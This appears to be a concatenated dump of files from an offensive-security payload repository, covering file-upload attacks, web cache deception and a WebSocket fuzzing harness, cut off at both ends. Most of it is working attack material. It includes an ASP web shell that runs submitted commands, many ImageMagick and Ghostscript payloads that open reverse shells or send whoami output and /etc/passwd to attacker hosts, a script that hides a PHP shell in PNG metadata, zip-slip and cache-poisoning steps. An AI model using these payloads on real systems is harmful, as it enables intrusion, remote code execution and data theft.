"); 40 | ctx.Response.Write("By @Hypn, for educational purposes only."); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood 20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "
") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | 67 | Laundanum ASP Shell 68 | 69 |
70 | Command:
71 | 72 |

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 |

Example command to do a directory listing:
74 | %ComSpec% /c dir 75 |

76 |
77 |
78 | Copyright © 2012, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net. 81 |
82 | 83 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.xamlx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()] 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/README.md: -------------------------------------------------------------------------------- 1 | ### XSS via SWF 2 | 3 | As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. 4 | This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. 5 | 6 | ```powershell 7 | Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); 8 | 9 | IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} 10 | 11 | IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); 12 | ``` -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/xss.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension Flash/xss.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension Flash/xssproject.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Extension HTML/xss.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/poc.js: -------------------------------------------------------------------------------- 1 | app.alert("XSS") -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/poc.py: -------------------------------------------------------------------------------- 1 | # FROM https://github.com/osnr/horrifying-pdf-experiments 2 | import sys 3 | 4 | from pdfrw import PdfWriter 5 | from pdfrw.objects.pdfname import PdfName 6 | from pdfrw.objects.pdfstring import PdfString 7 | from pdfrw.objects.pdfdict import PdfDict 8 | from pdfrw.objects.pdfarray import PdfArray 9 | 10 | def make_js_action(js): 11 | action = PdfDict() 12 | action.S = PdfName.JavaScript 13 | action.JS = js 14 | return action 15 | 16 | def make_field(name, x, y, width, height, r, g, b, value=""): 17 | annot = PdfDict() 18 | annot.Type = PdfName.Annot 19 | annot.Subtype = PdfName.Widget 20 | annot.FT = PdfName.Tx 21 | annot.Ff = 2 22 | annot.Rect = PdfArray([x, y, x + width, y + height]) 23 | annot.MaxLen = 160 24 | annot.T = PdfString.encode(name) 25 | annot.V = PdfString.encode(value) 26 | 27 | # Default appearance stream: can be arbitrary PDF XObject or 28 | # something. Very general. 29 | annot.AP = PdfDict() 30 | 31 | ap = annot.AP.N = PdfDict() 32 | ap.Type = PdfName.XObject 33 | ap.Subtype = PdfName.Form 34 | ap.FormType = 1 35 | ap.BBox = PdfArray([0, 0, width, height]) 36 | ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0]) 37 | ap.stream = """ 38 | %f %f %f rg 39 | 0.0 0.0 %f %f re f 40 | """ % (r, g, b, width, height) 41 | 42 | # It took me a while to figure this out. See PDF spec: 43 | # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641 44 | 45 | # Basically, the appearance stream we just specified doesn't 46 | # follow the field rect if it gets changed in JS (at least not in 47 | # Chrome). 48 | 49 | # But this simple MK field here, with border/color 50 | # characteristics, _does_ follow those movements and resizes, so 51 | # we can get moving colored rectangles this way. 52 | annot.MK = PdfDict() 53 | annot.MK.BG = PdfArray([r, g, b]) 54 | 55 | return annot 56 | 57 | def make_page(fields, script): 58 | page = PdfDict() 59 | page.Type = PdfName.Page 60 | 61 | page.Resources = PdfDict() 62 | page.Resources.Font = PdfDict() 63 | page.Resources.Font.F1 = PdfDict() 64 | page.Resources.Font.F1.Type = PdfName.Font 65 | page.Resources.Font.F1.Subtype = PdfName.Type1 66 | page.Resources.Font.F1.BaseFont = PdfName.Helvetica 67 | 68 | page.MediaBox = PdfArray([0, 0, 612, 792]) 69 | 70 | page.Contents = PdfDict() 71 | page.Contents.stream = """ 72 | BT 73 | /F1 24 Tf 74 | ET 75 | """ 76 | 77 | annots = fields 78 | 79 | page.AA = PdfDict() 80 | # You probably should just wrap each JS action with a try/catch, 81 | # because Chrome does no error reporting or even logging otherwise; 82 | # you just get a silent failure. 83 | page.AA.O = make_js_action(""" 84 | try { 85 | %s 86 | } catch (e) { 87 | app.alert(e.message); 88 | } 89 | """ % (script)) 90 | 91 | page.Annots = PdfArray(annots) 92 | return page 93 | 94 | if len(sys.argv) > 1: 95 | js_file = open(sys.argv[1], 'r') 96 | 97 | fields = [] 98 | for line in js_file: 99 | if not line.startswith('/// '): break 100 | pieces = line.split() 101 | params = [pieces[1]] + [float(token) for token in pieces[2:]] 102 | fields.append(make_field(*params)) 103 | 104 | js_file.seek(0) 105 | 106 | out = PdfWriter() 107 | out.addpage(make_page(fields, js_file.read())) 108 | out.write('result.pdf') -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/result.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension PDF JS/result.pdf -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/extensions.lst: -------------------------------------------------------------------------------- 1 | .jpeg.php 2 | .jpg.php 3 | .png.php 4 | .php 5 | .php3 6 | .php4 7 | .php5 8 | .php7 9 | .pht 10 | .phar 11 | .phpt 12 | .pgif 13 | .phtml 14 | .phtm 15 | .php%00.gif 16 | .php\x00.gif 17 | .php%00.png 18 | .php\x00.png 19 | .php%00.jpg 20 | .php\x00.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.jpg.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phar: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php3: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php4: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php5: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php7: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phpt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.pht: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phtml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.gif?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpeg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pgif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension PHP/shell.pgif -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phar: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php3: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php4: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php5: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php7: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phpt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pht: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/README.md: -------------------------------------------------------------------------------- 1 | # Image Tragik 1 & 2 2 | 3 | 4 | ## Exploit v1 5 | 6 | Simple reverse shell 7 | 8 | ```powershell 9 | push graphic-context 10 | encoding "UTF-8" 11 | viewbox 0 0 1 1 12 | affine 1 0 0 1 0 0 13 | push graphic-context 14 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 15 | pop graphic-context 16 | pop graphic-context 17 | ``` 18 | 19 | ## Exploit v2 20 | 21 | Simple `id` payload 22 | 23 | ```powershell 24 | %!PS 25 | userdict /setpagedevice undef 26 | save 27 | legal 28 | { null restore } stopped { pop } if 29 | { legal } stopped { pop } if 30 | restore 31 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops 32 | ``` 33 | 34 | then use `convert shellexec.jpeg whatever.gif` 35 | 36 | ## Thanks to 37 | 38 | * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf: -------------------------------------------------------------------------------- 1 | %!PS 2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ) 3 | .putdeviceparams 4 | quit -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'pango:@/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'text:/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 7 | pop graphic-context 8 | pop graphic-context 9 | 10 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez ' 7 | pop graphic-context 8 | pop graphic-context 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://IP_ATTAQUANT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image 3 | 4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php 5 | # --- How to use : http://localhost/shell.php?c=echo%20'
';ls
 6 | 
 7 | #shellcode  = ""
 9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'
';ls
10 | shellcode2 = ";').($_^'/');?>"
11 | 
12 | 
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 | 
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")
18 | im.info["shell"] = shellcode
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
20 | 
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 | 
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | 	if k in reserved: continue
28 | 	meta.add_text(k, v, 0)
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 | 
31 | print("Done")


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/GIF_exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/GIF_exploit.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/README.txt:
--------------------------------------------------------------------------------
1 | # How to use
2 | b.php?c=ls
3 | 
4 | 
5 | Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php:
--------------------------------------------------------------------------------
 1 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/exec.shtml:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/include.shtml:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/index.stm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |   
 5 |     
 6 |     
 7 |   
 8 | 
 9 |   
10 |     
11 |     
12 |   
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Zip Slip/README.md:
--------------------------------------------------------------------------------
 1 | # Zip Slip
 2 | 
 3 | > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. 
 4 | 
 5 | ## Summary
 6 | 
 7 | - [Detection](#detection)
 8 | - [Tools](#tools)
 9 | * [Exploits](#exploits)
10 |   * [Basic Exploit](#basic-exploit)
11 | - [Additional Notes](#additional-notes)
12 | 
13 | ## Detection
14 | 
15 | - Any zip upload page on the application
16 | 
17 | ## Tools
18 | 
19 | - evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
20 | 
21 | ## Exploits
22 | 
23 | ### Basic Exploit
24 | 
25 | ```python
26 | python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
27 | ```
28 | 
29 | ### Additional Notes
30 | - For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability
31 | 
32 | ## References
33 | 
34 | - [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
35 | - [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
36 | 


--------------------------------------------------------------------------------
/Web Cache Deception/README.md:
--------------------------------------------------------------------------------
 1 | # Web Cache Deception Attack
 2 | 
 3 | ## Tools
 4 | 
 5 | * [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner)
 6 |     > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
 7 | 
 8 | ## Exploit
 9 | 
10 | 1. Browser requests `http://www.example.com/home.php/non-existent.css`.
11 | 2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct to not cache this page.
12 | 3. The response goes through the proxy.
13 | 4. The proxy identifies that the file has a css extension.
14 | 5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.
15 | 
16 | ## Methodology of the attack - example
17 | 
18 | 1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
19 | 2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css`
20 | 3. The page is displayed as /home and the cache is saving the page
21 | 4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css`
22 | 5. The content of the cache is displayed
23 | 
24 | Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
25 | [![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093)
26 | 
27 | ## Methodology 2
28 | 
29 | 1. Find an unkeyed input for a Cache Poisoning
30 |     ```js
31 |     Values: User-Agent
32 |     Values: Cookie
33 |     Header: X-Forwarded-Host
34 |     Header: X-Host
35 |     Header: X-Forwarded-Server
36 |     Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host)
37 |     Header: X-Original-URL (Symfony)
38 |     Header: X-Rewrite-URL (Symfony)
39 |     ```
40 | 2. Cache poisoning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
41 |     ```js
42 |     GET /test?buster=123 HTTP/1.1
43 |     Host: target.com
44 |     X-Forwarded-Host: test">
45 | 
46 |     HTTP/1.1 200 OK
47 |     Cache-Control: public, no-cache
48 |     [..]
49 |     ">
50 |     ```
51 | 
52 | 
53 | ## References
54 | 
55 | * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
56 | * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
57 | * [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement)
58 | * [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
59 | * [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning)
60 |   - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
61 |   - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
62 | 


--------------------------------------------------------------------------------
/Web Sockets/Files/ws-harness.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | from __future__ import print_function
 3 | import socket,ssl
 4 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
 5 | from websocket import create_connection, WebSocket
 6 | from urlparse import parse_qs
 7 | import argparse
 8 | import os
 9 | 
10 | LOOP_BACK_PORT_NUMBER = 8000
11 | 
12 | def FuzzWebSocket(fuzz_value):
13 |     print(fuzz_value)
14 |     ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
15 |     result =  ws.recv()
16 |     return result
17 | 
18 | def LoadMessage(file):
19 |     file_contents = ""
20 |     try:
21 |         if os.path.isfile(file):
22 |             f = open(file,'r')
23 |             file_contents = f.read()
24 |             f.close()
25 |     except:
26 |         print("Error reading file: %s" % file)
27 |         exit()
28 |     return file_contents
29 | 
30 | class myWebServer(BaseHTTPRequestHandler):
31 |     
32 |     #Handler for the GET requests
33 |     def do_GET(self):
34 |         qs = parse_qs(self.path[2:])
